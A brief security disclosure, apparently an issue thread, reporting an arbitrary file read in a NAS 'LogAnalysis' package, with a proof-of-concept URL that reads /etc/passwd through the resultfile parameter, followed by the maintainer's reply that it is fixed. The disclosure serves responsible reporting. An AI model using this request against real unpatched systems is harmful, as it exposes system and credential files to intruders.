Opening the following url allows viewing the content of (probably) any file on the system:

https://<nas_url>:5001/webman/3rdparty/LogAnalysis/index.cgi?page=contentview&resultfile=/etc/passwd

Hi!

Thank you for reporting this security issue to me. I have just fixed the error and released a new package update.

Speedy! 🏆